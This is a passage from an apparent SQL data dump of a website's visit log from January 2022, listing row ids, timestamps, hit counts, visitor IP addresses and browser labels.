1640970356,1,0,1,0,'66.249.66.197',''),(561121,1640971024,1,1,0,0,'113.96.250.18','chrome'),(561122,1640972404,1,1,0,0,'91.196.178.201','other'),(561123,1640973555,1,1,0,0,'66.249.66.9','chrome'),(561124,1640985651,1,1,0,0,'66.249.66.159','chrome'),(561125,1640989054,1,1,0,0,'113.96.250.18','chrome'),(561126,1640992003,1,1,0,0,'88.155.17.185','other'),(561127,1641003361,1,1,0,0,'5.45.207.135','other'),(561128,1641003394,1,1,0,0,'95.108.213.8','other'),(561129,1641003783,1,1,0,0,'34.77.162.16','other'),(561130,1641004893,22,22,0,0,'128.199.78.183','other'),(561131,1641005734,1,1,0,0,'113.96.250.18','other'),(561132,1641008726,1,1,0,0,'66.249.66.9','chrome'),(561133,1641011234,1,1,0,0,'113.96.250.18','chrome'),(561134,1641020335,1,1,0,0,'113.96.250.18','chrome'),(561135,1641027601,1,1,0,0,'157.55.39.161','other'),(561136,1641031154,2,2,0,0,'113.96.250.18','chrome'),(561137,1641031565,1,1,0,0,'185.237.217.11','chrome'),(561138,1641031578,1,0,1,0,'66.249.66.86',''),(561139,1641044570,1,1,0,0,'31.13.127.42','other'),(561140,1641044571,1,1,0,0,'31.13.127.41','other'),(561141,1641050509,1,1,0,0,'113.96.250.18','chrome'),(561142,1641052098,1,1,0,0,'66.249.66.85','chrome'),(561143,1641053038,2,2,0,0,'113.96.250.18','msie'),(561144,1641053172,1,1,0,0,'157.55.39.158','other'),(561145,1641054153,2,2,0,0,'113.96.250.18','chrome'),(561146,1641054385,2,2,0,0,'173.252.111.18','other'),(561147,1641054386,3,3,0,0,'173.252.111.119','other'),(561148,1641054387,1,1,0,0,'173.252.111.17','other'),(561149,1641060676,1,1,0,0,'113.96.250.18','other'),(561150,1641062940,1,1,0,0,'113.96.250.18','opera'),(561151,1641063912,1,1,0,0,'113.96.250.18','chrome'),(561152,1641064111,1,1,0,0,'173.252.111.117','other'),(561153,1641064112,1,1,0,0,'173.252.111.4','other'),(561154,1641083217,1,1,0,0,'113.96.250.18','other'),(561155,1641094147,1,1,0,0,'113.96.250.18','other'),(561156,1641095579,1,1,0,0,'185.7.145.88','chrome'),(561157,1641106632,1,1,0,0,'92.118.160.1','other'),(561158,1641109133,1,1,0,0,'50.59.99.143','firefox'),(561159,1641120896,1,1,0,0,'113.96.250.18','chrome'),(561160,1641122192,1,1,0,0,'95.79.217.1','other'),(561161,1641132693,1,1,0,0,'113.96.250.18','other'),(561162,1641138219,1,1,0,0,'113.96.250.18','chrome'),(561163,1641142321,1,1,0,0,'185.237.217.11','chrome'),(561164,1641142464,1,1,0,0,'113.96.250.18','other'),(561165,1641142574,1,1,0,0,'92.118.160.37','other'),(561166,1641143174,1,0,1,0,'66.249.66.9',''),(561167,1641143608,1,1,0,0,'185.237.217.11','chrome'),(561168,1641144694,1,1,0,0,'185.237.217.11','chrome'),(561169,1641147268,1,1,0,0,'185.237.217.11','chrome'),(561170,1641147302,1,1,0,0,'178.92.251.218','chrome'),(561171,1641151057,1,1,0,0,'113.96.250.18','other'),(561172,1641153192,1,1,0,0,'66.249.66.85','chrome'),(561173,1641155369,1,1,0,0,'113.96.250.18','other'),(561174,1641160927,1,1,0,0,'113.96.250.18','other'),(561175,1641169898,1,1,0,0,'143.198.12.19','other'),(561176,1641182458,1,1,0,0,'92.118.160.61','other'),(561177,1641182569,1,1,0,0,'92.118.160.5','other'),(561178,1641187762,1,1,0,0,'113.96.250.18','other'),(561179,1641188896,1,1,0,0,'185.237.217.11','chrome'),(561180,1641192172,1,1,0,0,'113.96.250.18','chrome'),(561181,1641195132,1,1,0,0,'185.237.217.11','chrome'),(561182,1641196374,1,1,0,0,'185.7.145.88','chrome'),(561183,1641197501,2,2,0,0,'209.141.51.222','chrome'),(561184,1641199296,1,1,0,0,'185.237.217.11','chrome'),(561185,1641199911,1,1,0,0,'113.96.250.18','other'),(561186,1641202043,1,1,0,0,'113.96.250.18','chrome'),(561187,1641204653,1,1,0,0,'95.79.89.114','other'),(561188,1641209022,1,1,0,0,'69.197.185.43','chrome'),(561189,1641209282,1,1,0,0,'31.13.127.30','other'),(561190,1641209283,1,1,0,0,'31.13.127.6','other'),(561191,1641209297,1,1,0,0,'31.13.127.18','other'),(561192,1641209298,1,1,0,0,'31.13.127.4','other'),(561193,1641216104,1,1,0,0,'113.96.250.18','other'),(561194,1641220270,1,1,0,0,'66.249.66.9','chrome'),(561195,1641225138,1,1,0,0,'113.96.250.18','other'),(561196,1641225202,2,2,0,0,'113.96.250.18','msie'),(561197,1641227689,2,2,0,0,'173.252.111.21','other'),(561198,1641227690,1,1,0,0,'173.252.111.2','other'),(561200,1641227692,1,1,0,0,'173.252.111.18','other'),(561203,1641229336,1,1,0,0,'113.96.250.18','other'),(561204,1641229557,1,0,1,0,'66.249.66.86',''),(561205,1641237906,1,1,0,0,'113.96.250.18','other'),(561207,1641245723,2,2,0,0,'62.171.130.70','firefox'),(561208,1641249642,1,1,0,0,'66.249.66.87','chrome'),(561209,1641254396,1,1,0,0,'51.140.68.179','chrome'),(561210,1641254884,1,1,0,0,'113.96.250.18','other'),(561211,1641258637,2,2,0,0,'54.37.75.187','firefox'),(561212,1641277674,1,1,0,0,'157.55.39.158','other'),(561213,1641280487,1,1,0,0,'72.167.104.77','firefox'),(561214,1641293490,1,1,0,0,'91.196.178.169','chrome'),(561215,1641295498,1,1,0,0,'113.96.250.18','chrome'),(561216,1641299152,1,1,0,0,'91.196.178.169','chrome'),(561217,1641299688,1,1,0,0,'113.96.250.18','chrome'),(561218,1641302944,3,3,0,0,'47.242.241.0','other'),(561219,1641302948,1,1,0,0,'47.242.241.0','chrome'),(561220,1641308548,2,2,0,0,'113.96.250.18','other'),(561221,1641312012,1,1,0,0,'195.123.242.6','msie'),(561222,1641316144,1,0,1,0,'66.249.66.217',''),(561223,1641316377,1,0,1,0,'66.249.66.87',''),(561224,1641318423,1,1,0,0,'185.237.217.11','chrome'),(561225,1641320740,1,1,0,0,'185.237.217.11','chrome'),(561226,1641337151,1,1,0,0,'113.96.250.18','chrome'),(561227,1641338259,1,1,0,0,'113.96.250.18','firefox'),(561228,1641348703,1,1,0,0,'113.96.250.18','chrome'),(561229,1641352726,1,1,0,0,'8.210.41.144','chrome'),(561230,1641352733,2,2,0,0,'8.210.41.144','other'),(561231,1641353376,1,1,0,0,'66.249.66.158','chrome'),(561232,1641362390,1,1,0,0,'113.96.250.18','chrome'),(561233,1641363550,1,1,0,0,'91.196.178.169','chrome'),(561234,1641367577,2,2,0,0,'113.96.250.18','chrome'),(561235,1641369717,1,0,1,0,'66.249.66.7',''),(561236,1641374939,1,1,0,0,'66.249.66.85','chrome'),(561237,1641380824,1,1,0,0,'91.196.178.169','chrome'),(561238,1641383640,1,1,0,0,'66.249.66.197','chrome'),(561239,1641389426,1,1,0,0,'157.55.39.161','other'),(561240,1641396402,2,2,0,0,'113.96.250.18','chrome'),(561241,1641401831,3,3,0,0,'20.197.180.116','other'),(561242,1641409411,1,1,0,0,'66.249.66.201','chrome'),(561243,1641411533,1,1,0,0,'23.228.70.82','other'),(561244,1641412115,1,1,0,0,'18.117.115.75','firefox'),(561245,1641412904,1,0,1,0,'66.249.66.7',''),(561246,1641417299,1,1,0,0,'66.249.66.9','chrome'),(561247,1641418851,1,1,0,0,'66.249.66.159','chrome'),(561248,1641420247,1,1,0,0,'66.249.66.158','chrome'),(561249,1641426926,1,0,1,0,'66.249.66.5',''),(561250,1641431786,1,0,1,0,'66.249.66.85',''),(561251,1641448071,3,3,0,0,'81.169.238.121','firefox'),(561252,1641455400,1,1,0,0,'173.252.79.6','other'),(561253,1641460886,1,1,0,0,'184.168.102.151','firefox'),(561254,1641465921,1,1,0,0,'95.79.133.233','chrome'),(561255,1641486996,1,1,0,0,'66.249.66.5','chrome'),(561256,1641491506,2,2,0,0,'95.158.53.154','chrome'),(561257,1641492753,1,0,1,0,'66.249.66.197',''),(561258,1641500357,1,1,0,0,'205.169.39.136','chrome'),(561259,1641500497,2,2,0,0,'185.138.230.7','chrome'),(561260,1641503706,1,1,0,0,'20.197.180.116','other'),(561261,1641504069,1,1,0,0,'95.158.53.154','chrome'),(561262,1641504464,1,1,0,0,'173.252.111.19','other'),(561263,1641510685,1,1,0,0,'65.154.226.165','chrome'),(561264,1641511678,1,0,1,0,'66.249.66.199',''),(561265,1641521826,1,0,1,0,'66.249.66.158',''),(561266,1641522228,1,0,1,0,'66.249.66.159',''),(561267,1641529874,2,2,0,0,'209.141.33.65','chrome'),(561268,1641533507,1,1,0,0,'66.249.66.5','chrome'),(561269,1641552646,1,0,1,0,'66.249.66.9',''),(561270,1641553640,1,1,0,0,'161.35.119.224','chrome'),(561271,1641555549,1,1,0,0,'173.252.79.20','other'),(561272,1641558787,1,1,0,0,'23.228.70.82','other'),(561273,1641559658,1,1,0,0,'66.249.66.9','chrome'),(561274,1641561240,1,0,1,0,'66.249.66.85',''),(561275,1641562230,1,1,0,0,'31.13.103.15','other'),(561276,1641574507,1,1,0,0,'34.77.162.12','other'),(561277,1641577422,1,1,0,0,'194.156.95.209','firefox'),(561278,1641577423,1,1,0,0,'194.156.95.209','chrome'),(561279,1641584848,1,1,0,0,'92.118.160.41','other'),(561280,1641586612,1,1,0,0,'37.73.32.170','chrome'),(561281,1641591651,1,0,1,0,'66.249.66.197',''),(561282,1641592361,1,1,0,0,'184.168.115.59','firefox'),(561283,1641608033,1,0,1,0,'66.249.66.158',''),(561284,1641614476,1,1,0,0,'138.197.75.110','other'),(561285,1641617307,1,1,0,0,'157.245.3.104','other'),(561286,1641617995,1,1,0,0,'194.233.67.8','chrome'),(561287,1641648031,1,1,0,0,'87.250.224.45','other'),(561288,1641648372,1,1,0,0,'3.110.66.158','chrome'),(561289,1641654856,1,1,0,0,'31.13.127.8','other'),(561290,1641658741,1,1,0,0,'31.13.115.12','other'),(561291,1641666702,1,1,0,0,'88.155.35.34','chrome'),(561292,1641667301,1,0,1,0,'66.249.70.71',''),(561293,1641702750,2,2,0,0,'66.249.70.71','chrome'),(561294,1641705146,1,1,0,0,'66.249.70.73','chrome'),(561295,1641708341,1,1,0,0,'66.249.70.69','chrome'),(561296,1641709817,1,1,0,0,'31.13.103.1','other'),(561297,1641709818,1,1,0,0,'31.13.103.11','other'),(561298,1641711071,1,1,0,0,'66.249.70.73','chrome'),(561299,1641717379,1,1,0,0,'66.249.70.69','chrome'),(561300,1641720057,1,1,0,0,'66.249.70.69','chrome'),(561301,1641723920,1,0,1,0,'66.249.70.71',''),(561302,1641724061,2,1,1,0,'66.249.70.71',''),(561303,1641725361,1,0,1,0,'66.249.70.73',''),(561304,1641726164,1,1,0,0,'66.249.70.73','chrome'),(561305,1641726571,1,1,0,0,'95.79.91.218','chrome'),(561306,1641729885,1,1,0,0,'66.249.66.159','chrome'),(561307,1641745775,1,1,0,0,'66.249.66.87','chrome'),(561308,1641748572,1,0,1,0,'66.249.66.158',''),(561309,1641754074,1,0,1,0,'66.249.66.199',''),(561310,1641769433,1,1,0,0,'92.118.160.61','other'),(561311,1641779360,1,1,0,0,'50.59.99.143','firefox'),(561312,1641780779,1,1,0,0,'87.250.224.93','other'),(561313,1641785575,1,0,1,0,'66.249.66.129',''),(561314,1641785778,1,0,1,0,'66.249.66.223',''),(561315,1641796448,1,1,0,0,'66.249.66.85','chrome'),(561316,1641805244,1,1,0,0,'66.249.66.86','chrome'),(561317,1641817440,1,1,0,0,'157.55.39.158','other'),(561318,1641821543,2,2,0,0,'35.173.177.195','firefox'),(561319,1641821838,1,1,0,0,'91.196.178.107','chrome'),(561320,1641822849,1,1,0,0,'92.118.160.17','other'),(561321,1641822908,1,1,0,0,'66.249.66.85','chrome'),(561322,1641826982,5,5,0,0,'35.215.121.179','chrome'),(561323,1641833885,1,1,0,0,'128.199.208.149','chrome'),(561324,1641835027,1,1,0,0,'88.155.88.221','chrome'),(561325,1641835662,3,3,0,0,'173.252.111.18','other'),(561326,1641835663,1,1,0,0,'173.252.111.16','other'),(561328,1641835664,1,1,0,0,'173.252.111.13','other'),(561329,1641835665,1,1,0,0,'31.13.127.28','other'),(561330,1641835690,1,1,0,0,'173.252.111.3','other'),(561331,1641835691,3,3,0,0,'173.252.111.11','other'),(561332,1641839830,1,0,1,0,'66.249.66.199',''),(561333,1641840723,2,2,0,0,'109.234.161.233','firefox'),(561335,1641841104,1,1,0,0,'185.237.217.11','chrome'),(561336,1641841868,1,1,0,0,'88.155.99.165','chrome'),(561337,1641848894,1,0,1,0,'66.249.66.85',''),(561338,1641854557,1,1,0,0,'69.63.184.7','other'),(561339,1641875028,1,1,0,0,'66.249.66.129','chrome'),(561340,1641880436,1,1,0,0,'66.249.66.87','chrome'),(561341,1641880938,1,1,0,0,'162.0.215.176','firefox'),(561342,1641888807,1,1,0,0,'66.249.66.85','chrome'),(561343,1641892858,1,1,0,0,'66.249.66.86','chrome'),(561344,1641908861,2,2,0,0,'205.185.117.203','chrome'),(561345,1641909283,1,0,1,0,'66.249.66.197',''),(561346,1641915735,1,1,0,0,'95.158.53.149','chrome'),(561347,1641917542,1,1,0,0,'66.249.66.223','chrome'),(561348,1641918968,2,2,0,0,'167.248.133.57','other'),(561349,1641921444,1,1,0,0,'66.249.66.223','chrome'),(561350,1641923143,1,1,0,0,'20.113.94.161','chrome'),(561351,1641925134,1,0,1,0,'66.249.66.199',''),(561352,1641932614,1,0,1,0,'66.249.66.199',''),(561353,1641934810,1,0,1,0,'66.249.66.197',''),(561354,1641939385,1,1,0,0,'66.249.92.9','other'),(561355,1641939646,1,1,0,0,'213.180.203.68','other'),(561356,1641945499,1,1,0,0,'45.129.18.88','chrome'),(561357,1641975648,1,0,1,0,'66.249.66.85',''),(561358,1641977600,1,1,0,0,'66.249.66.86','chrome'),(561359,1641979547,1,1,0,0,'194.87.146.234','msie'),(561360,1641980966,1,1,0,0,'66.249.66.85','chrome'),(561361,1641988946,1,1,0,0,'194.87.210.91','chrome'),(561362,1642006336,1,1,0,0,'157.245.240.102','firefox'),(561363,1642006708,2,2,0,0,'3.80.33.78','firefox'),(561364,1642017497,1,0,1,0,'66.249.66.85',''),(561365,1642025380,1,0,1,0,'66.249.66.197',''),(561366,1642025949,1,1,0,0,'66.249.66.87','chrome'),(561367,1642040429,1,1,0,0,'195.64.229.168','chrome'),(561368,1642041341,1,1,0,0,'207.46.13.211','other'),(561369,1642045104,1,1,0,0,'66.249.66.159','chrome'),(561370,1642045438,1,0,1,0,'66.249.66.158',''),(561371,1642057074,3,3,0,0,'213.180.203.94','other'),(561372,1642057089,1,1,0,0,'87.250.224.132','other'),(561373,1642059922,1,1,0,0,'66.249.66.87','chrome'),(561374,1642063352,1,0,1,0,'66.249.66.85',''),(561375,1642065309,1,1,0,0,'66.249.66.86','chrome'),(561376,1642096779,1,1,0,0,'207.46.13.130','other'),(561377,1642098840,1,1,0,0,'195.64.229.168','chrome'),(561378,1642102855,1,0,1,0,'66.249.66.87',''),(561379,1642102937,1,1,0,0,'31.129.232.7','chrome'),(561380,1642104289,1,1,0,0,'207.46.13.130','other'),(561381,1642144791,1,1,0,0,'2.59.222.12','chrome'),(561382,1642147752,1,1,0,0,'128.124.208.201','chrome'),(561383,1642149951,1,0,1,0,'66.249.66.87',''),(561384,1642172772,1,1,0,0,'91.196.178.179','chrome'),(561385,1642190177,1,1,0,0,'2.59.222.12','chrome'),(561386,1642192947,1,1,0,0,'69.171.249.22','other'),(561387,1642192964,1,1,0,0,'31.13.103.6','other'),(561388,1642213722,1,1,0,0,'92.118.160.61','other'),(561389,1642219434,1,1,0,0,'45.129.18.79','chrome'),(561390,1642225579,1,0,1,0,'66.249.66.159',''),(561391,1642226595,1,1,0,0,'2.59.222.12','chrome'),(561392,1642231292,1,1,0,0,'173.252.79.8','other'),(561393,1642271219,1,1,0,0,'103.159.50.183','firefox'),(561394,1642271924,1,0,1,0,'66.249.66.9',''),(561395,1642281093,1,1,0,0,'87.250.224.36','other'),(561396,1642282607,1,1,0,0,'95.108.213.61','other'),(561397,1642284404,1,1,0,0,'87.250.224.173','other'),(561398,1642288658,1,0,1,0,'66.249.66.7',''),(561399,1642303666,34,34,0,0,'51.91.7.5','firefox'),(561400,1642313991,1,0,1,0,'66.249.66.5',''),(561401,1642322959,1,1,0,0,'87.250.224.36','other'),(561402,1642325110,1,1,0,0,'157.55.39.1','other'),(561403,1642343931,2,2,0,0,'137.74.27.104','firefox'),(561404,1642352007,1,1,0,0,'95.79.225.166','other'),(561405,1642354540,1,1,0,0,'173.252.111.17','other'),(561407,1642361138,1,1,0,0,'184.168.96.0','firefox'),(561408,1642370043,1,0,1,0,'66.249.66.9',''),(561409,1642379939,1,1,0,0,'95.108.213.61','other'),(561410,1642395120,1,1,0,0,'87.250.224.36','other'),(561411,1642397897,1,1,0,0,'103.51.103.2','firefox'),(561412,1642404257,1,0,1,0,'66.249.66.86',''),(561413,1642414992,1,1,0,0,'87.250.224.157','other'),(561414,1642427749,1,1,0,0,'91.196.178.169','chrome'),(561415,1642428243,1,1,0,0,'31.13.127.7','other'),(561417,1642428244,1,1,0,0,'31.13.127.8','other'),(561418,1642428245,1,1,0,0,'31.13.127.42','other'),(561419,1642428250,1,1,0,0,'31.13.127.28','other'),(561420,1642428251,1,1,0,0,'31.13.127.116','other'),(561421,1642428253,1,1,0,0,'31.13.127.39','other'),(561422,1642428254,1,1,0,0,'31.13.127.40','other'),(561423,1642428255,1,1,0,0,'31.13.127.18','other'),(561424,1642428423,1,1,0,0,'69.171.231.1','other'),(561425,1642428540,1,1,0,0,'95.135.213.201','chrome'),(561426,1642428611,1,1,0,0,'46.211.78.249','other'),(561427,1642428624,1,1,0,0,'173.252.107.24','other'),(561428,1642428740,1,1,0,0,'91.196.178.168','chrome'),(561429,1642430723,1,1,0,0,'91.196.178.169','chrome'),(561430,1642436975,1,1,0,0,'92.118.160.61','other'),(561431,1642444813,1,0,1,0,'66.249.66.7',''),(561432,1642444827,1,0,1,0,'66.249.66.85',''),(561433,1642444996,1,1,0,0,'2.59.222.12','chrome'),(561434,1642446531,1,1,0,0,'185.237.217.11','chrome'),(561435,1642493437,2,2,0,0,'69.171.249.119','other'),(561436,1642493723,3,3,0,0,'51.140.68.179','other'),(561437,1642501897,1,0,1,0,'66.249.66.85',''),(561438,1642515193,3,3,0,0,'51.140.68.179','chrome'),(561439,1642523906,1,1,0,0,'184.168.100.133','firefox'),(561440,1642525711,1,1,0,0,'185.220.102.7','chrome'),(561441,1642535074,1,1,0,0,'66.249.66.87','chrome'),(561442,1642535511,1,1,0,0,'69.171.249.6','other'),(561443,1642535512,1,1,0,0,'69.171.249.14','other'),(561444,1642535834,1,1,0,0,'66.249.66.158','chrome'),(561445,1642536189,1,1,0,0,'66.249.66.86','chrome'),(561446,1642536887,1,1,0,0,'93.84.109.210','chrome'),(561447,1642544155,1,1,0,0,'51.15.251.143','other'),(561448,1642564748,1,1,0,0,'37.187.26.195','firefox'),(561449,1642573010,1,1,0,0,'66.249.66.194','chrome'),(561450,1642577268,1,1,0,0,'66.249.66.87','chrome'),(561451,1642578234,1,1,0,0,'87.250.224.157','other'),(561452,1642591517,1,1,0,0,'66.249.66.86','chrome'),(561453,1642599361,1,0,1,0,'66.249.70.91',''),(561454,1642601353,1,1,0,0,'5.58.116.230','chrome'),(561455,1642605639,1,1,0,0,'66.249.70.29','chrome'),(561456,1642608707,1,0,1,0,'45.142.122.213',''),(561457,1642612142,1,1,0,0,'157.55.39.1','other'),(561458,1642624942,1,1,0,0,'31.182.250.31','chrome'),(561459,1642629653,1,1,0,0,'207.46.13.95','other'),(561460,1642632112,1,0,1,0,'66.249.70.71',''),(561461,1642635961,1,1,0,0,'66.249.70.73','chrome'),(561462,1642637626,1,1,0,0,'66.249.70.71','chrome'),(561463,1642661430,1,1,0,0,'66.249.70.69','chrome'),(561464,1642661574,2,2,0,0,'31.13.127.12','other'),(561467,1642661575,2,2,0,0,'31.13.127.22','other'),(561474,1642662495,3,3,0,0,'51.140.68.179','chrome'),(561475,1642664413,1,1,0,0,'66.249.70.69','chrome'),(561476,1642667520,1,0,1,0,'66.249.64.39',''),(561477,1642674504,3,3,0,0,'51.140.68.179','other'),(561478,1642675072,1,1,0,0,'31.13.127.32','other'),(561480,1642681144,1,1,0,0,'64.246.165.180','firefox'),(561481,1642683003,1,1,0,0,'91.196.178.169','chrome'),(561482,1642698138,2,2,0,0,'66.249.66.9','chrome'),(561483,1642704095,1,0,1,0,'66.249.66.194',''),(561484,1642716841,1,1,0,0,'45.129.18.45','chrome'),(561485,1642717355,1,1,0,0,'66.249.66.194','chrome'),(561486,1642734417,1,1,0,0,'66.249.66.87','chrome'),(561487,1642736362,1,1,0,0,'66.249.66.159','chrome'),(561488,1642740716,1,0,1,0,'66.249.66.7',''),(561489,1642745308,1,1,0,0,'66.249.66.223','chrome'),(561490,1642745479,1,1,0,0,'66.249.66.85','chrome'),(561491,1642747630,2,2,0,0,'31.13.127.11','other'),(561492,1642748488,1,0,1,0,'66.249.66.159',''),(561493,1642749722,1,1,0,0,'66.249.66.197','chrome'),(561494,1642755541,1,1,0,0,'31.13.127.16','other'),(561495,1642758712,1,1,0,0,'173.252.79.7','other'),(561496,1642775146,1,1,0,0,'66.249.66.5','chrome'),(561497,1642781719,2,2,0,0,'45.149.83.238','chrome'),(561498,1642794169,1,0,1,0,'66.249.66.158',''),(561499,1642799909,1,1,0,0,'173.252.111.25','other'),(561500,1642799910,2,2,0,0,'173.252.111.21','other'),(561502,1642805014,1,1,0,0,'115.159.148.91','firefox'),(561503,1642805187,1,0,1,0,'66.249.66.59',''),(561504,1642806824,1,1,0,0,'66.249.66.40','chrome'),(561505,1642813323,1,1,0,0,'66.249.66.59','chrome'),(561506,1642815238,1,1,0,0,'163.172.148.199','other'),(561507,1642818306,1,1,0,0,'45.149.83.238','chrome'),(561508,1642818307,1,1,0,0,'45.149.83.238','other'),(561509,1642838779,3,3,0,0,'185.237.217.11','chrome'),(561510,1642839022,1,1,0,0,'31.13.127.9','other'),(561511,1642839023,1,1,0,0,'31.13.127.11','other'),(561512,1642839034,4,4,0,0,'31.13.127.7','other'),(561513,1642839040,1,1,0,0,'173.252.87.118','other'),(561514,1642839298,1,1,0,0,'31.13.127.1','other'),(561515,1642839301,1,1,0,0,'31.13.127.10','other'),(561516,1642839304,1,1,0,0,'31.13.127.17','other'),(561517,1642839354,1,1,0,0,'31.13.127.23','other'),(561518,1642839543,1,1,0,0,'31.13.127.19','other'),(561519,1642839727,1,1,0,0,'185.237.217.11','chrome'),(561520,1642840563,1,1,0,0,'178.93.223.216','chrome'),(561521,1642841371,1,1,0,0,'91.196.178.201','chrome'),(561522,1642841595,1,1,0,0,'46.211.94.133','chrome'),(561523,1642841631,1,1,0,0,'185.237.217.11','chrome'),(561524,1642843434,1,1,0,0,'193.26.13.150','chrome'),(561525,1642843828,1,1,0,0,'69.171.249.24','other'),(561526,1642843837,1,1,0,0,'66.220.149.17','other'),(561527,1642843921,1,0,1,0,'66.249.66.61',''),(561528,1642844978,1,1,0,0,'185.237.217.11','chrome'),(561529,1642845250,1,1,0,0,'94.254.167.44','chrome'),(561530,1642846879,1,1,0,0,'173.252.87.119','other'),(561531,1642847445,1,1,0,0,'141.105.133.2','chrome'),(561532,1642847606,1,1,0,0,'69.171.249.21','other'),(561533,1642848279,1,1,0,0,'173.252.127.26','other'),(561534,1642849079,1,1,0,0,'163.172.148.199','other'),(561535,1642849817,1,1,0,0,'185.109.52.156','chrome'),(561536,1642849830,1,1,0,0,'69.171.249.116','other'),(561537,1642849831,1,1,0,0,'69.171.249.24','other'),(561538,1642850060,1,1,0,0,'69.171.251.24','other'),(561539,1642850061,1,1,0,0,'66.220.149.117','other'),(561541,1642850998,1,1,0,0,'188.69.212.143','other'),(561542,1642851420,1,1,0,0,'46.211.8.85','chrome'),(561543,1642851426,1,1,0,0,'173.252.79.7','other'),(561544,1642851427,1,1,0,0,'173.252.79.18','other'),(561545,1642854209,1,1,0,0,'85.223.194.156','chrome'),(561546,1642860009,1,1,0,0,'178.133.137.59','chrome'),(561547,1642860940,1,1,0,0,'185.75.223.2','other'),(561548,1642864055,2,2,0,0,'173.252.111.8','other'),(561551,1642864056,2,2,0,0,'173.252.111.119','other'),(561556,1642864072,1,1,0,0,'173.252.87.20','other'),(561557,1642864856,1,1,0,0,'176.118.151.115','chrome'),(561558,1642865990,1,1,0,0,'185.237.217.11','chrome'),(561559,1642867378,1,1,0,0,'46.96.178.247','chrome'),(561560,1642869815,1,1,0,0,'91.196.178.217','chrome'),(561561,1642869830,1,1,0,0,'173.252.107.116','other'),(561562,1642870500,2,2,0,0,'69.171.249.4','other'),(561563,1642875672,1,1,0,0,'46.211.175.221','chrome'),(561564,1642875906,1,1,0,0,'69.171.251.23','other'),(561565,1642876099,1,1,0,0,'92.205.5.130','firefox'),(561566,1642878397,1,1,0,0,'194.60.254.32','chrome'),(561567,1642878555,1,1,0,0,'91.196.178.56','chrome'),(561568,1642880542,1,1,0,0,'92.112.231.46','chrome'),(561569,1642881812,1,1,0,0,'146.120.168.175','chrome'),(561570,1642881891,1,1,0,0,'185.237.217.11','chrome'),(561571,1642887381,1,1,0,0,'37.73.109.82','other'),(561572,1642892115,1,1,0,0,'66.249.66.59','chrome'),(561573,1642899522,1,1,0,0,'31.41.94.145','chrome'),(561574,1642906359,1,1,0,0,'122.17.148.164','firefox'),(561575,1642911674,2,2,0,0,'176.31.28.226','chrome'),(561576,1642923681,1,0,1,0,'66.249.66.61',''),(561577,1642926797,1,1,0,0,'185.237.217.11','chrome'),(561578,1642931868,1,1,0,0,'5.255.253.185','other'),(561579,1642933567,1,1,0,0,'207.46.13.95','other'),(561580,1642935948,1,1,0,0,'54.148.139.138','firefox'),(561581,1642938264,1,1,0,0,'193.56.151.209','chrome'),(561582,1642938813,1,1,0,0,'87.250.224.150','other'),(561583,1642951735,1,1,0,0,'87.250.224.192','other'),(561584,1642953762,1,1,0,0,'66.249.66.82','chrome'),(561585,1642955235,1,1,0,0,'87.250.224.114','other'),(561586,1642958652,1,1,0,0,'173.252.83.7','other'),(561587,1642959728,1,1,0,0,'5.255.231.246','other'),(561588,1642960425,1,1,0,0,'46.133.69.139','chrome'),(561589,1642961220,1,1,0,0,'5.255.253.117','other'),(561590,1642962367,1,1,0,0,'173.252.111.17','other'),(561593,1642962981,1,1,0,0,'173.252.95.13','other'),(561594,1642963628,1,1,0,0,'5.45.207.88','other'),(561595,1642964260,1,1,0,0,'5.45.207.140','other'),(561596,1642969732,1,1,0,0,'92.253.236.128','chrome'),(561597,1642969938,1,1,0,0,'31.13.127.29','other'),(561598,1642969939,1,1,0,0,'31.13.127.5','other'),(561599,1642969944,1,1,0,0,'31.13.127.3','other'),(561601,1642969945,1,1,0,0,'31.13.127.42','other'),(561602,1642972507,1,1,0,0,'45.129.18.102','chrome'),(561603,1642974023,1,1,0,0,'69.171.249.2','other'),(561604,1642974066,1,1,0,0,'69.171.251.15','other'),(561605,1642980620,1,1,0,0,'5.45.207.153','other'),(561606,1642984824,1,1,0,0,'5.255.253.189','other'),(561607,1642985996,1,1,0,0,'87.250.224.200','other'),(561608,1642988691,1,1,0,0,'66.249.66.57','chrome'),(561609,1642989205,1,1,0,0,'5.45.207.153','other'),(561610,1642990247,1,1,0,0,'87.250.224.6','other'),(561611,1642993634,1,1,0,0,'87.250.224.26','other'),(561612,1642998160,2,2,0,0,'45.149.83.238','chrome'),(561613,1643001075,1,1,0,0,'87.250.224.138','other'),(561614,1643008739,1,1,0,0,'5.255.253.162','other'),(561615,1643010190,1,0,1,0,'66.249.66.61',''),(561616,1643015995,1,1,0,0,'5.255.231.246','other'),(561617,1643021843,1,1,0,0,'95.79.86.137','chrome'),(561618,1643023259,1,1,0,0,'87.250.224.17','other'),(561619,1643033814,1,1,0,0,'95.79.223.148','chrome'),(561620,1643041346,1,1,0,0,'69.171.249.21','other'),(561622,1643041347,1,1,0,0,'69.171.249.22','other'),(561624,1643048946,1,1,0,0,'5.45.207.153','other'),(561625,1643055480,1,1,0,0,'91.232.158.81','other'),(561626,1643055535,1,1,0,0,'31.13.115.23','other'),(561627,1643055536,1,1,0,0,'31.13.115.24','other'),(561628,1643055716,1,1,0,0,'173.252.111.2','other'),(561629,1643055717,1,1,0,0,'173.252.111.120','other'),(561630,1643063681,1,1,0,0,'5.45.207.139','other'),(561631,1643067173,1,1,0,0,'66.249.66.59','chrome'),(561632,1643079325,1,1,0,0,'5.45.207.139','other'),(561633,1643080706,1,1,0,0,'5.45.207.134','other'),(561634,1643084510,2,2,0,0,'176.31.28.244','chrome'),(561635,1643090655,1,1,0,0,'213.180.203.75','other'),(561636,1643090745,5,5,0,0,'54.174.185.86','chrome'),(561637,1643092056,1,1,0,0,'31.13.127.9','other'),(561638,1643096357,1,1,0,0,'87.250.224.28','other'),(561639,1643097355,1,1,0,0,'213.180.203.96','other'),(561640,1643098257,1,1,0,0,'47.254.69.97','firefox'),(561641,1643098638,1,1,0,0,'173.252.79.1','other'),(561642,1643098640,1,1,0,0,'31.13.115.118','chrome'),(561643,1643098648,1,1,0,0,'31.13.115.16','chrome'),(561644,1643098649,1,1,0,0,'31.13.115.17','chrome'),(561645,1643102223,2,2,0,0,'2.57.122.86','chrome'),(561646,1643106192,1,1,0,0,'213.174.1.52','chrome'),(561647,1643106285,1,1,0,0,'173.252.83.24','other'),(561648,1643107453,1,1,0,0,'173.252.87.8','other'),(561649,1643107962,1,1,0,0,'5.45.207.141','other'),(561650,1643112685,1,1,0,0,'66.249.66.59','chrome'),(561651,1643115489,1,0,1,0,'66.249.66.61',''),(561652,1643117104,1,1,0,0,'87.250.224.112','other'),(561653,1643117282,1,1,0,0,